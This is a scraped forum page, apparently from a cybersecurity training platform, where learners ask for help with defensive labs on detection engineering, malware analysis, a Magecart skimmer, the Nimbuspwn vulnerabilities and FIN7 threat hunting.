Introduction to Detection Engineering: Ep.5 – Custom Alerting
Struggling to get the token for this one. Got the Python script working (I think?) - it's generating alerts into Elastic, without replaying duplicates. But I get the select LatMov events - then wait and wait - before eventually getting; @timestamp<actual timestamp here> alert_messageNot all instances of lateral movement detected. Please restart the lab to try again._id7qvVgpMBEQ2Wr4UXppEV_indexcustom_alert_index_score - Sometimes I don't even get that, just a handful of events then the Lab expires. Is there any more detailed guidance on this lab? Feels like the guidance was written at 4:59pm on Friday, if you know what I mean 😂 Also a bit confused, the guidance says play around with the sleep() function, as it describes the "WAIT_TIME_MINUTES" - fairly sure it's actually seconds? Unless IL have written their own custom 'time' module?26Views0likes1CommentEvents & Breaches: Magecart Skimmer
Hello - I need a hand locating the domain. (Q7) I've found the name of the file that contains the skimmer then exported that. I have then opened that in a text editor and searched for "http://" and "https://" in the big chunk of text but nothing is matching.57Views1like5CommentsMalware Analysis: Tracking a LOLBins Campaign – Examination
I have completed all of the questions within this lab except for question 7 and question 13. Both of these questions appear to have something to do with execution of the 1st and 2nd downloaded files in the lab. I have successfully completed the deobfuscation of each file but I can not seem to execute the appropriate step(s) or action(s) to go to the correct answers for these last 2 questions. Any insight or guidance on what I'm missing / doing incorrectly and how to correctit would be greatly appreciated. I have provided a few screenshots for reference. Thanks in advance.34Views0likes2CommentsCVE-2022-29799/CVE-2022-29800 (Nimbuspwn) – Defensive
Hello community, I can't find the answer to these question I tried using the Sigma file provided in the lab to query Splunk it returned no events. I also tried doing custom queries with using similar strings. But I never got the correct answers Any helpis appreciated. ThanksSolved70Views2likes3CommentsFoundational Static Analysis: Analyzing Structures
The question is asking me "In the disassembly at address 00401567, what is the structure EDX is pointing to? Look at Microsoft Docs for help!" At the very end of the briefing they go over the explanation of how to identify which offset is determining which call. I am 90% positive that the offset we are supposed to be identifying in this case is 0x17c. However within this SAME blurb while they are explaining the way the stack line up they simply identify which API the offset in their example is pointing to. THEY NEVER MENTION HOW THEY GOT THERE! I am sure that it requires some research an I have been trying to identify anything within MSDN database but I can't find a single clue how identify what API 0x17c is pointing to. I have even tried looking up references for the offset they had 0x138 which they identified as STARTUPINFO. (I googled both terms together.) Now I am most definitely missing something here. I step within the assembly analysis mayb ebut I am at a loss. If anyone could help me out I would appreciate it.134Views0likes6CommentsMalicious Document Analysis: Dropper Analysis
I have completed up to question 6 on here and I can not get the python script to work. I have gone through and "fixed" the required portions but keep getting "modulenotfound: no module named 'oletools'". Any pointers on what I'm doing wrong and how to fix it would be appreciated.Solved115Views3likes7CommentsFIN7 Threat Hunting with Splunk: Ep.3 – Execution Logs
For this lab I need to rebuild the PowerShell script using the three parts found in the PowerShell operational logs. Which I am able to do fairly easily but when I am required to obtain the MD5 hash of the file I am not getting the correct hash. I've removed any trailing white spaces and return characters. Not matter the setup, I just can't seem to find the special sauce on this one. I've tried numerous approaches and still get a no go. Any tips?Solved204Views1like27CommentsHelp needed for Threat Hunting: Mining Behaviour
Hey everyone! I need some help with this last question of a lab. I already identified the JSON authentication token and the packet that holds it. But within that packet, I just can't find the authentication key that identifies the miner. Anyone was able to solve and help? Thanks!Solved109Views1like5Comments